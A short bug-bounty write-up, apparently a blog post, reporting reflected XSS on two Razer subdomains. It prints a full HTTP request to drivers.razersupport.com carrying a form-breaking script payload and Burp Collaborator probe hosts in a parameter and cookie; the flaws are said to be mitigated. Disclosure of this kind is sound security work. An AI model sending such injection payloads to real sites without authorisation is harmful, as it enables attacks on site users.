2 Reflected XSS In Razer

First Of All thanks for reading my first write up in medium

My Name Is Mostafa I Am Working As information Security Engineer And My Part Time Doing Some Bug Hunting

I Found 2 Vulnerabilities In The Different Subdomains in Razer

The First One is reflected XSS in (http://drivers.razersupport.com)

When I Searching To XSS Looked To Refelected Params I Found CSRF Token Have Been reflected and Commented In HTML Response So This Is The First One I Just Close The Form Tag And Wrote XSS Payload And Has Been Executed

GET /index.php?_m=k2n4qnfei8t8yk2e7ua78c7m7dd41t.burpcollaborator.net&_a=viewdownload&downloaditemid=800&nav=0Quote%3AOriginally%2C76%2C168%2C11%2C131?_m=downloads&_a=viewdownload&downloaditemid=800&nav=0Quote%3AOriginally%2C76%2C168%2C11%2C131&_m=downloads&_a=viewdownload&downloaditemid=800&nav=0Quote%3AOriginally%2C76%2C168%2C11%2C131?_m=downloads&_a=viewdownload&downloaditemid=800&nav=0Quote%3AOriginally%2C76%2C168%2C11%2C131 → →”></form><h1><script>alert(document.domain)</script></h1> HTTP/1.1
Host: drivers.razersupport.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://www.google.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SWIFT_sessionid40=59cpx8mzpt0t559zefhsfxe7eykq8f.burpcollaborator.net; _gcl_au=1.1.291319320.1592845997; __utma=124197257.1459569068.1592845998.1592845998.1592845998.1; __utmc=124197257; __utmz=124197257.1592845998.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __utmt=1; __utmb=124197257.1.10.1592845998; _ga=GA1.2.1459569068.1592845998; _gid=GA1.2.741943482.1592845999; __unam=c0300f2–172dd050e1d-36a23205–2; _dc_gtm_UA-33485401–2=1
Connection: close

The Second Reflected XSS (auth.pay.razer.com)

Good Advice Test all Reflected Inputs and Don’t Use Automation Tools To Find XSS

All Issues Is Mitigated

Thanks

Information Security Engineer And Bug Hunter